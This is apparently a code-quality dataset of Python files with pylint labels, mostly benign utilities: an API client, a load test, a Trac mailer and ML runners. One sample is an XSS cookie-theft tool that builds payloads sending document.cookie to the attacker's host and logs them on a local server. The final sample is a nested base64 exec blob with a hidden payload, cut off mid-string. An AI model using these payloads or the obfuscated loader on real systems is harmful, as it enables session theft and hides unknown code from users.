code
stringlengths 20
13.2k
| label
stringlengths 21
6.26k
|
---|---|
1 import requests
2 import json
3 import functools
4 import logging
5 # from collections import defaultdict
6 # from xml.etree import ElementTree
7
8
9 # ref: https://stackoverflow.com/questions/7684333/converting-xml-to-dictionary-using-elementtree
10 # def etree_to_dict(t):
11 # d = {t.tag: {} if t.attrib else None}
12 # children = list(t)
13 # if children:
14 # dd = defaultdict(list)
15 # for dc in map(etree_to_dict, children):
16 # for k, v in dc.items():
17 # dd[k].append(v)
18 # d = {t.tag: {k: v[0] if len(v) == 1 else v
19 # for k, v in dd.items()}}
20 # if t.attrib:
21 # d[t.tag].update(('@' + k, v)
22 # for k, v in t.attrib.items())
23 # if t.text:
24 # text = t.text.strip()
25 # if children or t.attrib:
26 # if text:
27 # d[t.tag]['#text'] = text
28 # else:
29 # d[t.tag] = text
30 # return d
31
32
33 logger = logging.getLogger(__name__)
34
35
36 entrypoint = '/api'
37
38
39 class PRTGError(Exception):
40 pass
41
42
43 class PRTGAuthenticationError(PRTGError):
44 pass
45
46
47 class ResponseTypes:
48 @staticmethod
49 def json(data):
50 return json.loads(data)
51
52 # @staticmethod
53 # def xml(data):
54 # return etree_to_dict(ElementTree.XML(data))
55
56
57 class API:
58 def __init__(self, host, username, passhash):
59 self._requests = requests
60 self._host = host
61 self._authparams = {
62 "username": username,
63 "passhash": passhash
64 }
65
66 @property
67 def requests(self):
68 return self._requests
69
70 @requests.setter
71 def requests(self, val):
72 self._requests = val
73
74 def _call(self, method, response_type=None, **params):
75 if response_type is None:
76 response_type = 'json'
77 if not hasattr(ResponseTypes, response_type):
78 raise ValueError("Unknown response type", response_type)
79 url = '%s%s/%s.%s' % (self._host, entrypoint, method, response_type)
80 try:
81 params = dict(params, **self._authparams)
82 response = self._requests.get(url, params=params)
83 if response.status_code != 200:
84 logger.warning("Wrong exit code %d for %s", response.status_code, url)
85 raise PRTGError("Invalid HTTP code response", response.status_code)
86 return getattr(ResponseTypes, response_type)(response.content.decode('utf-8'))
87 except Exception as e:
88 raise PRTGError(e) from e
89
90 def __getattr__(self, item):
91 return functools.partial(self._call, item)
92
93 @staticmethod
94 def from_credentials(host, username, password, _requests=None):
95 url = '%s%s/getpasshash.htm' % (host, entrypoint)
96 params = {
97 "username": username,
98 "password": password,
99 }
100 if _requests is None:
101 _requests = requests.Session()
102
103 response = _requests.get(url, params=params)
104 if response.status_code != 200:
105 raise PRTGAuthenticationError("Couldn't authenticate", response.status_code, response.content)
106 result = API(host, username, response.content)
107 result.requests = _requests
108 return result
109
| 47 - refactor: too-few-public-methods
|
1 from locust import HttpLocust, TaskSet, task
2
3 class WebsiteTasks(TaskSet):
4 @task
5 def index(self):
6 self.client.get("/")
7
8 @task
9 def status(self):
10 self.client.get("/status")
11
12 @task
13 def hetarchief(self):
14 self.client.get("/status/hetarchief.png")
15
16 @task
17 def ftp(self):
18 self.client.get("/status/ftp.png")
19
20 class WebsiteUser(HttpLocust):
21 task_set = WebsiteTasks
22 min_wait = 5000
23 max_wait = 15000
| 20 - refactor: too-few-public-methods
|
1 import os
2 from flask import jsonify, Response
3 import flask
4
5
6 class FileResponse(Response):
7 default_mimetype = 'application/octet-stream'
8
9 def __init__(self, filename, **kwargs):
10 if not os.path.isabs(filename):
11
12 filename = os.path.join(flask.current_app.root_path, filename)
13
14 with open(filename, 'rb') as f:
15 contents = f.read()
16
17 response = contents
18 super().__init__(response, **kwargs)
19
20
21 class StatusResponse(FileResponse):
22 default_mimetype = 'image/png'
23
24 def __init__(self, status, **kwargs):
25 if status is True:
26 status = 'ok'
27 elif status is False:
28 status = 'nok'
29 else:
30 status = 'unk'
31
32 filename = 'static/status-%s.png' % (status,)
33 super().__init__(filename, **kwargs)
34
35
36 class Responses:
37 @staticmethod
38 def json(obj):
39 return jsonify(obj)
40
41 @staticmethod
42 def html(obj):
43 return Response('<html><body>%s</body></html>' % (obj,), content_type='text/html')
44
45 @staticmethod
46 def txt(obj):
47 if type(obj) is not str:
48 obj = '\n'.join(obj)
49 return Response(obj, content_type='text/plain')
50
51 @staticmethod
52 def status(status_):
53 return StatusResponse(status_)
| 6 - refactor: too-few-public-methods
21 - refactor: too-few-public-methods
|
1 #!/usr/bin/env python
2 # -*- coding: utf-8 -*-
3 #
4
5 # if you want to test this script, set this True:
6 # then it won't send any mails, just it'll print out the produced html and text
7 #test = False
8 test = False
9
10 #which kind of db is Trac using?
11 mysql = False
12 pgsql = False
13 sqlite = True
14
15 # for mysql/pgsql:
16 dbhost="localhost"
17 dbuser="database_user"
18 dbpwd="database_password"
19 dbtrac="database_of_trac"
20 #or for sqlite:
21 sqlitedb='/path/to/trac/db/trac.db'
22 #or if your db is in memory:
23 #sqlitedb=':memory:'
24
25 # the url to the trac (notice the slash at the end):
26 trac_url='https://trac.example.org/path/to/trac/'
27 # the default domain, where the users reside
28 # ie: if no email address is stored for them, username@domain.tld will be used
29 to_domain="@example.org"
30
31 import codecs, sys
32 sys.setdefaultencoding('utf-8')
33 import site
34
35 # importing the appropriate database connector
36 # (you should install one, if you want to use ;)
37 # or you can use an uniform layer, like sqlalchemy)
38 if mysql:
39 import MySQLdb
40 if pgsql:
41 import psycopg2
42 if sqlite:
43 from pysqlite2 import dbapi2 as sqlite
44
45 import time
46 import smtplib
47 from email.mime.multipart import MIMEMultipart
48 from email.mime.text import MIMEText
49 db = None
50 cursor = None
51
52 try:
53 if mysql:
54 db = MySQLdb.connect(host=dbhost, user=dbuser, passwd=dbpwd, db=dbtrac)
55 if pgsql:
56 db = psycopg2.connect("host='"+ dbhost +"' user='" + dbuser + "' password='" + dbpwd + "' dbname='" + dbtrac + "'")
57 if sqlite:
58 db = sqlite.connect(sqlitedb)
59 except:
60 print "cannot connect to db"
61 raise
62 sys.exit(1)
63
64 cursor = db.cursor()
65
66 fields = ['summary', 'component', 'priority', 'status', 'owner', 'reporter']
67
68 #I think MySQL needs '"' instead of "'" without any ';',
69 # with more strict capitalization (doubling quotes mean a single quote ;) )
70 # so you'll have to put these queries into this format:
71 # sql="""query""" or sql='"query"' like
72 # sql = '"SELECT owner FROM ticket WHERE status !=""closed""""'
73 # for postgresql simply use:
74 sql = "select id, %s from ticket where status == 'testing' or status == 'pre_testing';" % ', '.join(fields)
75 cursor.execute(sql)
76 tickets = cursor.fetchall()
77 tickets_dict = {}
78
79 # Reading last exec time
80 last_exec_path = '/var/local/trac_testing_tickets_notify_last_exec_timestamp'
81 last_exec = 0
82 try:
83 f = open(last_exec_path, "r")
84 last_exec = int(f.read())
85 f.close()
86 except:
87 last_exec = 0
88
89 cur_time = int(time.time())
90 notify_tickets = set()
91 time_quant = 86400 # seconts per day - frequence of reminds
92 ticket_url = 'https://trac.example.org/path/to/trac/ticket/'
93
94 recipient_list = ['recipient1@example.org', 'recipient2@example.arg', ]
95
96 for ticket in tickets:
97 tickets_dict[ticket[0]] = {'id': ticket[0]}
98 offset = 1
99 for field in fields:
100 tickets_dict[ticket[0]][field] = ticket[offset]
101 offset += 1
102
103 sql = "select time from ticket_change where ticket == %d and field == 'status' and (newvalue == 'testing' or newvalue == 'pre_testing') order by time desc limit 1;" % ticket[0]
104 cursor.execute(sql)
105 last_time = cursor.fetchall()
106 if len(last_time) > 0:
107 last_time = last_time[0][0]
108 if (int((cur_time - last_time) / time_quant) != int((last_exec - last_time) / time_quant)) and int((cur_time - last_time) / time_quant) > 0:
109 notify_tickets |= set([ticket[0], ])
110
111 # No new tickets - aborting
112 if len(notify_tickets) == 0:
113 print 'No new tickets: aborting.'
114 exit()
115
116 #calculating column widths
117 column_widths = {}
118 for id in notify_tickets:
119 for field, value in tickets_dict[id].iteritems():
120 column_widths[field] = field in column_widths and max(column_widths[field], len("%s" % value)) or max(len("%s" % value), len("%s" % field))
121
122 #generating mail text
123 msg_header = """
124 List of tickets pending your attention:
125 """
126 msg_tail = """
127 Trac testing tickets notification script.
128 """
129 header_line_template = '|| %%(id)%ds ||' % (len(ticket_url) + column_widths['id'])
130 normal_line_template = '|| %s%%(id)%ds ||' % (ticket_url, column_widths['id'])
131 line_template = ''
132 for field in fields:
133 line_template += ' %%(%s)%ds ||' % (field, column_widths[field])
134
135 header = { 'id' : 'URL' }
136 for field in fields:
137 header[field] = field
138 table_header = (header_line_template + line_template) % header
139
140 table = []
141 for id in notify_tickets:
142 table.append((normal_line_template + line_template) % tickets_dict[id])
143
144 msg = '\n'.join ([msg_header, table_header] + table + [msg_tail])
145
146 htmlmsg_header = '''
147 <html>
148 <head>
149 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
150 </head>
151 <body>
152 <table>
153 '''
154 htmlmsg_tail = '''
155 </table>
156 </body>
157 </html>
158 '''
159
160 normal_line_template = '<td><a href="%s%%(id)s">%%(id)s</a></td>' % ticket_url
161 line_template = ''
162 for field in fields:
163 line_template += '<td>%%(%s)s</td>' % field
164
165 htmltable_header = '<tr><th>' + '</th><th>'.join(['Ticket'] + fields) + '</th></tr>'
166 htmltable = []
167 for id in notify_tickets:
168 htmltable.append(('<tr>' + normal_line_template + line_template + '</tr>') % tickets_dict[id])
169
170 htmlmsg = '\n'.join ([htmlmsg_header, htmltable_header] + htmltable + [htmlmsg_tail])
171
172 import email.Charset
173 email.Charset.add_charset('utf-8', email.Charset.SHORTEST, None, None)
174
175 if test:
176 print msg
177 print
178 print htmlmsg
179 else:
180 mailmsg = MIMEMultipart('alternative')
181 mailmsg['Subject'] = "Report testing Tickets at %s" % time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
182 mailmsg['From'] = 'trac@example.org'
183 mailmsg['To'] = ', '.join(recipient_list)
184
185 part1 = MIMEText(msg, 'plain')
186 part2 = MIMEText(htmlmsg.encode('utf-8', 'replace'), 'html', 'utf-8')
187
188 mailmsg.attach(part1)
189 mailmsg.attach(part2)
190
191 s = smtplib.SMTP()
192 s.connect()
193 s.sendmail(mailmsg['From'], recipient_list, mailmsg.as_string())
194 s.close()
195
196 f = open(last_exec_path, "w")
197 f.write("%s" % cur_time)
198 f.close()
| 60 - error: syntax-error
|
1 import os
2 import random
3 import smtplib # Email
4 from dotenv import load_dotenv # For getting stored password
5 #import getpass # For dynamically enter password
6
7 load_dotenv()
8
9 username = input("E-mail: ") # e.g. "your_gmail_to_send_from@gmail.com"
10 password = os.getenv("PASSWORD") # alternatively: getpass.getpass()
11
12 def santa_message_body(santa_assigment):
13 return f"Your secret santa assignment is {santa_assigment}."
14
15 def send_email(to_person, to_email, subject, message_body):
16
17 server = smtplib.SMTP('smtp.gmail.com', 587)
18 server.ehlo()
19 server.starttls()
20 server.login(username, password)
21
22 sender_name = "Rami Manna"
23 message = f"""From: {sender_name} <{username}>
24 To: {to_person} <{to_email}>
25 MIME-Version: 1.0
26 Content-type: text/html
27 Subject: {subject}
28
29 {message_body}
30
31 """
32
33 server.sendmail(username, to_email, message)
34 server.quit()
35
36
37 def send_secret_santas(participants):
38 not_gifted = {name for name, email in participants}
39 for name, email in participants:
40 santa_assigment = random.choice(list(not_gifted - {name}))
41 not_gifted.remove(santa_assigment)
42
43 message_body = santa_message_body(santa_assigment)
44 subject = "Your Secret Santa Assignment!"
45 send_email(name, email, subject, message_body)
46
47 PARTICIPANTS = [('Harry Potter', 'potter@hogwarts.edu'), ('Hermione Granger', "hermione@hogwarts.edu")]
48
49 if __name__ == "__main__":
50
51 send_secret_santas(PARTICIPANTS)
52
| Clean Code: No Issues Detected
|
1 import requests
2 import json
3 import pandas as pd
4 url = "https://maps.googleapis.com/maps/api/place/textsearch/json"
5 key = "change_this"
6 cities = [
7 'jakarta',
8 'surabaya',
9 'malang',
10 'semarang'
11 ]
12 cols = ['street_address', 'lat', 'long']
13 df = pd.DataFrame(columns=cols)
14
15 for city in cities:
16 querystring = {"query":f"indomaret in {city}","key":key}
17 res = requests.request("GET", url, params=querystring)
18 json_res = json.loads(res.text)
19 for result in json_res['results']:
20 address = result['formatted_address']
21 lat = result['geometry']['location']['lat']
22 lng = result['geometry']['location']['lng']
23 df = df.append(pd.Series([address, lat, lng], index=cols), ignore_index=True)
24 df.to_csv('for_pepe.csv', index=False)
| 17 - warning: missing-timeout
|
1 from learn import ModelTrainer
2 from collection import Collection
3 import pandas as pd
4
5 import logging
6 import traceback
7 import os
8
9 logging.basicConfig()
10 logger = logging.getLogger(__name__)
11 logger.setLevel(logging.INFO)
12
13 # === THESIS ===
14
15 anbieter_config = {
16 'Construction': [
17 'Alpiq AG',
18 'KIBAG',
19 'Egli AG',
20 ],
21 'IT': [
22 'Swisscom',
23 'ELCA Informatik AG',
24 'Unisys',
25 ],
26 'Other': [
27 'Kummler + Matter AG',
28 'Thermo Fisher Scientific (Schweiz) AG',
29 'AXA Versicherung AG',
30 ],
31 'Diverse': [
32 'Siemens AG',
33 'ABB',
34 'Basler & Hofmann West AG',
35 ]
36 }
37
38
39
40 # === TESTING ===
41
42 #anbieter = 'Marti AG' #456
43 #anbieter = 'Axpo AG' #40
44 #anbieter = 'Hewlett-Packard' #90
45 #anbieter = 'BG Ingénieurs Conseils' SA #116
46 #anbieter = 'Pricewaterhousecoopers' #42
47 #anbieter = 'Helbling Beratung + Bauplanung AG' #20
48 #anbieter = 'Ofrex SA' #52
49 #anbieter = 'PENTAG Informatik AG' #10
50 #anbieter = 'Wicki Forst AG' #12
51 #anbieter = 'T-Systems Schweiz' #18
52 #anbieter = 'Bafilco AG' #20
53 #anbieter = '4Video-Production GmbH' #3
54 #anbieter = 'Widmer Ingenieure AG' #6
55 #anbieter = 'hmb partners AG' #2
56 #anbieter = 'Planmeca' #4
57 #anbieter = 'K & M Installationen AG' #4
58
59
60 select = (
61 "ausschreibung.meldungsnummer, "
62 "anbieter.institution as anbieter_institution, "
63 "auftraggeber.beschaffungsstelle_plz, "
64 "ausschreibung.gatt_wto, "
65 "ausschreibung.sprache, "
66 "ausschreibung.auftragsart, "
67 "ausschreibung.auftragsart_art, "
68 "ausschreibung.lose, "
69 "ausschreibung.teilangebote, "
70 "ausschreibung.varianten, "
71 "ausschreibung.bietergemeinschaft, "
72 "cpv_dokument.cpv_nummer as ausschreibung_cpv"
73 )
74
75 attributes = ['ausschreibung_cpv', 'auftragsart_art', 'beschaffungsstelle_plz', 'auftragsart', 'gatt_wto','lose','teilangebote', 'varianten','sprache']
76 #attributes = ['auftragsart_art', 'beschaffungsstelle_plz', 'auftragsart', 'ausschreibung_cpv', 'gatt_wto','teilangebote', 'sprache']
77 #attributes = ['ausschreibung_cpv', 'auftragsart_art', 'beschaffungsstelle_plz', 'auftragsart', 'gatt_wto','lose','teilangebote', 'varianten','sprache']
78 # attributes = [
79 # [ 'ausschreibung_cpv', 'auftragsart_art' ],
80 # [ 'ausschreibung_cpv', 'beschaffungsstelle_plz' ],
81 # [ 'ausschreibung_cpv', 'auftragsart' ],
82 # [ 'ausschreibung_cpv', 'gatt_wto' ],
83 # [ 'ausschreibung_cpv', 'lose' ],
84 # [ 'ausschreibung_cpv', 'teilangebote' ],
85 # [ 'ausschreibung_cpv', 'varianten' ],
86 # [ 'ausschreibung_cpv', 'sprache' ]
87 # ]
88
89 config = {
90 # ratio that the positive and negative responses have to each other
91 'positive_to_negative_ratio': 0.5,
92 # Percentage of training set that is used for testing (Recommendation of at least 25%)
93 'test_size': 0.25,
94 'runs': 100,
95 #'enabled_algorithms': ['random_forest'],
96 'enabled_algorithms': ['random_forest', 'decision_tree', 'gradient_boost'],
97 'random_forest': {
98 # Tune Random Forest Parameter
99 'n_estimators': 100,
100 'max_features': 'sqrt',
101 'max_depth': None,
102 'min_samples_split': 4
103 },
104 'decision_tree': {
105 'max_depth': 30,
106 'max_features': 'sqrt',
107 'min_samples_split': 4
108 },
109 'gradient_boost': {
110 'n_estimators': 100,
111 'learning_rate': 0.1,
112 'max_depth': 30,
113 'min_samples_split': 4,
114 'max_features': 'sqrt'
115 }
116 }
117
118
119 class IterationRunner():
120
121 def __init__(self, anbieter_config, select, attributes, config):
122 self.anbieter_config = anbieter_config
123 self.select = select
124 self.attributes = attributes
125 self.config = config
126 self.trainer = ModelTrainer(select, '', config, attributes)
127 self.collection = Collection()
128
129 def run(self):
130 for label, anbieters in self.anbieter_config.items():
131 logger.info(label)
132 for anbieter in anbieters:
133 for attr_id in range(len(self.attributes)):
134 att_list = self.attributes[:attr_id+1]
135 self.singleRun(anbieter, att_list, label)
136 self.trainer.resetSQLData()
137
138 def runAttributesEachOne(self):
139 for label, anbieters in self.anbieter_config.items():
140 logger.info(label)
141 for anbieter in anbieters:
142 for attr in self.attributes:
143 att_list = [attr]
144 self.singleRun(anbieter, att_list, label)
145 self.trainer.resetSQLData()
146
147 def runAttributesList(self):
148 for label, anbieters in self.anbieter_config.items():
149 logger.info(label)
150 for anbieter in anbieters:
151 for att_list in self.attributes:
152 self.singleRun(anbieter, att_list, label)
153 self.trainer.resetSQLData()
154
155 def runSimpleAttributeList(self):
156 for label, anbieters in self.anbieter_config.items():
157 logger.info(label)
158 for anbieter in anbieters:
159 self.singleRun(anbieter, self.attributes, label)
160 self.trainer.resetSQLData()
161
162 def singleRun(self, anbieter, att_list, label):
163 logger.info('label: {}, anbieter: {}, attributes: {}'.format(label, anbieter, att_list))
164 try:
165 self.trainer.attributes = att_list
166 self.trainer.anbieter = anbieter
167 output = self.trainer.run()
168 output['label'] = label
169 self.collection.append(output)
170 filename = os.getenv('DB_FILE', 'dbs/auto.json')
171 self.collection.to_file(filename)
172 except Exception as e:
173 traceback.print_exc()
174 print(e)
175 print('one it done')
176
177 runner = IterationRunner(anbieter_config, select, attributes, config)
178
179 if __name__ == '__main__':
180 # runner.collection.import_file('dbs/auto.json')
181 runner.run()
182 runner.runAttributesEachOne()
183 runner.runAttributesList()
184 # label, anbieters = next(iter(runner.anbieter_config.items()))
185 # print(label)
| 121 - warning: redefined-outer-name
121 - warning: redefined-outer-name
121 - warning: redefined-outer-name
121 - warning: redefined-outer-name
163 - warning: logging-format-interpolation
172 - warning: broad-exception-caught
3 - warning: unused-import
|
1 import configparser
2 import sqlalchemy
3
4 # git update-index --skip-worktree config.ini
5
6
7 config = configparser.ConfigParser()
8
9
10 config.read("config.ini")
11
12 connection_string = 'mysql+' + config['database']['connector'] + '://' + config['database']['user'] + ':' + config['database']['password'] + '@' + config['database']['host'] + '/' + config['database']['database']
13
14 if __name__ == "__main__":
15 for item, element in config['database'].items():
16 print('%s: %s' % (item, element))
17 print(connection_string)
18 else:
19 engine = sqlalchemy.create_engine(connection_string)
20 connection = engine.connect()
| Clean Code: No Issues Detected
|
1 import json
2 import pandas as pd
3 import warnings
4
5 class Collection():
6
7 algorithms = ['gradient_boost', 'decision_tree', 'random_forest']
8
9 def __init__(self):
10 self.list = []
11
12
13 def append(self, item):
14 self.list.append(item)
15
16 def __iter__(self):
17 return iter(self.list)
18
19 def get_all_as_df(self, algorithm):
20 try:
21 tmp = []
22 for iteration in self.list:
23 tmp.append(iteration[algorithm]['metadata'])
24 return pd.DataFrame(tmp, index=[iteration['anbieter'] for iteration in self.list])
25 except:
26 warnings.warn('Select an algorithm: "random_forest", "gradient_boost" or "decision_tree"')
27
28 def df_row_per_algorithm(self):
29 tmp = []
30 for iteration in self.list:
31 for algorithm in self.algorithms:
32 output = iteration[algorithm]['metadata']
33 evaluation_dataframe = pd.DataFrame.from_dict(iteration[algorithm]['data'])
34 # missing metrics
35 output['acc_std'] = evaluation_dataframe['accuracy'].std()
36 evaluation_dataframe['MCC'] = evaluation_dataframe['MCC']*100
37 output['mcc_std'] = evaluation_dataframe['MCC'].std()
38 output['fn_std'] = evaluation_dataframe['fn_rate'].std()
39
40 output['anbieter'] = iteration['anbieter']
41 output['label'] = iteration['label']
42 output['algorithm'] = algorithm
43 output['attributes'] = ",".join(iteration['attributes'])
44 tmp.append(output)
45 return pd.DataFrame(tmp)
46
47 def to_json(self, **kwargs):
48 return json.dumps(self.list, **kwargs)
49
50 def to_file(self, filename):
51 with open(filename, 'w') as fp:
52 json.dump(self.list, fp, indent=4, sort_keys=True)
53
54 def import_file(self, filename, force=False):
55 if len(self.list) and not force:
56 warnings.warn("Loaded Collection, pls add force=True")
57 else:
58 with open(filename, 'r') as fp:
59 self.list = json.load(fp)
| 25 - warning: bare-except
19 - refactor: inconsistent-return-statements
51 - warning: unspecified-encoding
58 - warning: unspecified-encoding
|
1 #!/usr/bin/python3
2
3 import argparse
4 import os
5 from http.server import HTTPServer, BaseHTTPRequestHandler
6 from urllib.parse import parse_qs
7 from requests import *
8 ip = get('https://api.ipify.org').text
9
10 parser = argparse.ArgumentParser(description='creates xss payloads and starts http server to capture responses and collect cookies', epilog='xssthief --error 10.10.10.50' + '\n' + 'xssthief --image 10.10.10.50' + '\n' + 'xssthief --obfuscated 10.10.10.50', formatter_class=argparse.RawTextHelpFormatter)
11 parser.add_argument('lhost', help='ip address of listening host')
12 parser.add_argument('-e', '--error', action='store_true', help='create error payload')
13 parser.add_argument('-i', '--image', action='store_true', help='create image payload')
14 parser.add_argument('-o', '--obfuscated', action='store_true', help='create obfuscated payload')
15 args = parser.parse_args()
16
17 lhost = ip
18
19 class handler(BaseHTTPRequestHandler):
20 def do_GET(self):
21 qs = {}
22 path = self.path
23 if '?' in path:
24 path, temp = path.split('?', 1)
25 qs = parse_qs(temp)
26 print(qs)
27
28 def serve():
29 print('Starting server, press Ctrl+C to exit...\n')
30 address = (lhost, 80)
31 httpd = HTTPServer(address, handler)
32 try:
33 httpd.serve_forever()
34 except KeyboardInterrupt:
35 httpd.server_close()
36 print('\nBye!')
37
38 def obfuscate():
39 js = '''document.write('<img src=x onerror=this.src="http://''' + lhost + '''/?cookie="+encodeURI(document.getElementsByName("cookie")[0].value)>');'''
40 ords = ','.join([str(ord(c)) for c in js])
41 payload = '<img src="/><script>eval(String.fromCharCode(' + ords + '))</script>" />'
42 return payload
43
44 def err_payload():
45 xss = '''<img src=x onerror=this.src='http://''' + lhost + '''/?cookie='+document.cookie>'''
46 print('[*] Your payload: ' + xss + '\n')
47 serve()
48
49 def img_payload():
50 xss = '''<new Image().src='http://''' + lhost + '''/?cookie='+document.cookie>'''
51 print('[*] Your payload: ' + xss + '\n')
52 serve()
53
54 def obs_payload():
55 xss = obfuscate()
56 print('[*] Your payload: ' + xss + '\n')
57 serve()
58
59 def main():
60 if args.obfuscated:
61 obs_payload()
62 elif args.error:
63 err_payload()
64 elif args.image:
65 img_payload()
66 else:
67 parser.print_help()
68
69 main()
| 20 - warning: bad-indentation
21 - warning: bad-indentation
22 - warning: bad-indentation
23 - warning: bad-indentation
24 - warning: bad-indentation
25 - warning: bad-indentation
26 - warning: bad-indentation
29 - warning: bad-indentation
30 - warning: bad-indentation
31 - warning: bad-indentation
32 - warning: bad-indentation
33 - warning: bad-indentation
34 - warning: bad-indentation
35 - warning: bad-indentation
36 - warning: bad-indentation
39 - warning: bad-indentation
40 - warning: bad-indentation
41 - warning: bad-indentation
42 - warning: bad-indentation
45 - warning: bad-indentation
46 - warning: bad-indentation
47 - warning: bad-indentation
50 - warning: bad-indentation
51 - warning: bad-indentation
52 - warning: bad-indentation
55 - warning: bad-indentation
56 - warning: bad-indentation
57 - warning: bad-indentation
60 - warning: bad-indentation
61 - warning: bad-indentation
62 - warning: bad-indentation
63 - warning: bad-indentation
64 - warning: bad-indentation
65 - warning: bad-indentation
66 - warning: bad-indentation
67 - warning: bad-indentation
7 - warning: redefined-builtin
7 - warning: wildcard-import
8 - warning: missing-timeout
4 - warning: unused-import
7 - warning: unused-wildcard-import
|
1 #-------------------------------------------------#
2 # Obfuscate By Mr.GamingThanks To Black Coder Crush
3 # github : https://github.com/clayhacker-max
4 # from Linux
5 # localhost : aarch64
6 # key : Asep-fA6bC2eA6tB8lX8
7 # date : Fri Jul 16 13:54:16 2021
8 #-------------------------------------------------#
9 #Compile By DNMODZ
10 #My Team : Black Coder Crush
11 import base64
12 exec(base64.b64decode("#Compile By DNMODZ
#My Team : Black Coder Crush
import base64
exec(base64.b64decode("I0NvbXBpbGUgQnkgRE5NT0RaCiNNeSBUZWFtIDogQmxhY2sgQ29kZXIgQ3J1c2gKaW1wb3J0IGJhc2U2NApleGVjKGJhc2U2NC5iNjRkZWNvZGUoIkkwTnZiWEJwYkdVZ1Fua2dSRTVOVDBSYUNpTk5lU0JVWldGdElEb2dRbXhoWTJzZ1EyOWtaWElnUTNKMWMyZ0thVzF3YjNKMElHSmhjMlUyTkFwbGVHVmpLR0poYzJVMk5DNWlOalJrWldOdlpHVW9Ja2t3VG5aaVdFSndZa2RWWjFGdWEyZFNSVFZPVkRCU1lVTnBUazVsVTBKVldsZEdkRWxFYjJkUmJYaG9XVEp6WjFFeU9XdGFXRWxuVVROS01XTXlaMHRoVnpGM1lqTktNRWxIU21oak1sVXlUa0Z3YkdWSFZtcExSMHBvWXpKVk1rNUROV2xPYWxKcldsZE9kbHBIVlc5SmEydDNWRzVhYVZkRlNuZFphMlJXV2pGR2RXRXlaRk5TVkZaUFZrUkNVMWxWVG5CVWF6VnNWVEJLVmxkc1pFZGtSV3hGWWpKa1VtSllhRzlYVkVwNldqRkZlVTlYZEdGWFJXeHVWVlJPUzAxWFRYbGFNSFJvVm5wR00xbHFUa3ROUld4SVUyMW9hazFzVlhsVWEwWjNZa2RXU0ZadGNFeFNNSEJ2V1hwS1ZrMXJOVVJPVjJ4UFlXeEtjbGRzWkU5a2JIQklWbGM1U21FeWRETldSelZoWVZaa1JsTnVaRnBoTWxKWFYycEdSMlJYUlhsYVJrNVRWa1phVUZaclVrTlZNV3hXVkc1Q1ZXRjZWbk5XVkVKTFZteGtjMXBGWkd0U1YzaEdXV3BLYTFWdFNsbGhSemxZVmtWd05sZHFSa1psVlRsWVpFZEdXRkpYZUhWV1ZsSlBVekF4V0ZSWWJHRk5TRkp2Vm01d1IwMHhiSEZVYTNST1VsZDRTVlV5TVc5aGF6RnpWbGhzVldFd1dqTlphMlJYVTBaYWRHTkZlRk5OU0VKMlYxaHdTMVpyTVhKT1ZWSlBWako0VUZsWGVFdGpiR1J6V2tVNWEySklRa2xXYkdNMVUyMUtWbGRzYkZWV2JXaHlXVlpWZDJReVNYcGFSbEpYVmpKb1VWWkhlR3RVTURCM1RWVmFhMUl5YUZoYVYzUmFaV3hrV0dORk9WUk5SRVpIV1d0V2IxVkdaRWxSYTFwWFZtMW9SRnBFUm5Oak1rWkdWRzEwYVZaVVZYaFdiRnByWVRKRmVGTlliR3hTUlVwWldXdFdWMDB4VmpaVGEyUllVbFJHV2xkclpITlVhekZJVDFST1ZrMVdXblpXUkVwVFl6SkZlbUpIZEZOTk1taDVWbFphVTFFeFVrZGlSbVJhVFRKb2NsUlhkSE5PYkZWNVkwVk9WR0pGTlVkWk1HTTFWMjFLVlZKc1VtRlNla1pNVmxkemVGSnRVa1pqUlRWVFZrWldOVlpxU2pCaE1WcHpZak5vV0dFeWFIQlZNRnBMWVVaYVYxVnJUbFZTYlZJd1ZHeFdNR0V5U2xaalJsWldWbnBGZDFZeWVHdFNNVTUxVkcxR1UxWXhTalpYYTFaaFpERmFSMUp1VmxKaVYzaFpWV3hXZG1WV1pGVlRWRVpXWWtjNU5Ga3dWbTlWTWtaeVUyMW9WMDFHY0V4YVJFWnpZekZ3UjFkc1ZtaE5SRlYzVmtkNGIxbFhSWGxXYkZwVFZrWmFWVlpzWkZOV1JteFdXa1pPVkZKc2NIaFZWekZ2VmpKV2NsZHVjRmRTVjA0elZGWmtVMlJHVm5GV2JVWk9UVVZ3UjFac1dtOVJNbEp6WWtoR1ZXSkhVbk5XYkdRMFVteFNWbHBIZEdoV01IQldXVlJPZDFaV1NqWlNibHBoVW5wR1ZGWXhXazlXYXpWV1ZXMXNWMUpXYjNwV01XTjNUVlpaZDAxVlpHcFNiRXBUVm10a05GTXhWblZqUm1ST1lraENTbGxZY0VkaE1VbDNWMnhzVldKR1NraFpWRVpLWlVaYWNrOVdTazVoYTFwVlYxWldhMVl4V2tkU2JGWnBVbGhDVkZwWGVGcGxWbVJ5WVVoS1RsWXdWalJaYTFwellVVXhSVlpyVmxwaVJrcElWRmQ0YzJSRk5WZFViV3hPVWpOb1IxWkdWbXRoTWtaWVUyeFdhRTB6UWxaVmJuQkRUa1p3U0UxVmRHdFdiRm93VkRGV1YxWnNaRVpTV0doWFRXNW9jbFZxU2xkV2JVcEdWbXMxVTAxc1NuZFhWM2hUWTIxV2MxVnJhRTlYUlRWd1ZXMHhORmRzVlhoV1ZFWlRVbTVCTWxWWGREUldSbVJJWlVVNVdsWXpVbnBVYkZwVFYwZE9SbU5IZUZkV1JWbzBWbFJHYjJNeFVuUlNia3BwVWtaYVZsWnNVbGRTVm14MFkzcEdUbUpIVWxaVk1qVjNXVlV4VmxOc1ZsWldlbFl6V1ZaVmVHTnJOVmxpUm1ocFVqSm9WRmRyV210VWJWWldUMVpvYWxJeWFFOVphMXB6VFRGV05sRnRPVlZOYkVwNldWUk9jMkV4U1hwaFNFcFdWMGhDV0ZWVVJsZGtSMUkyVm14U2FWSnJjRFZXYlRFMFZqRlNWMUpZWkZSaGJIQmhXVmQwZDFWR2EzbGxTR1JZVm14YVdsWnRlR0ZVYkVwSVpVVmFWMWRJUWtkVWJGcExWakZPV1dGR1VtaE5TRUpYVm14U1MwMUdVWGhTV0d4T1ZsaFNVRlpxUmt0VFZscDBUbGhrVkdKRmNFWlZWekF4VjJzeGNWSnJhR0ZTYkhBelZUQlZOVmRXVm5KTlYyeFRVak5STUZZeFVrcGxSa2w1Vld4a2FsSlhhRkZXTUZwTFZGWldjbFpzV210TlZrWTBWbGQwUzJGc1NsZFRiRTVhWVd0d00xVXlNVmRXYXpGWlVteFNXRkl6YUZCWFZtUXdZekExVjFWc2FHcFNXRUp6Vm14U1IyVkdWbkpYY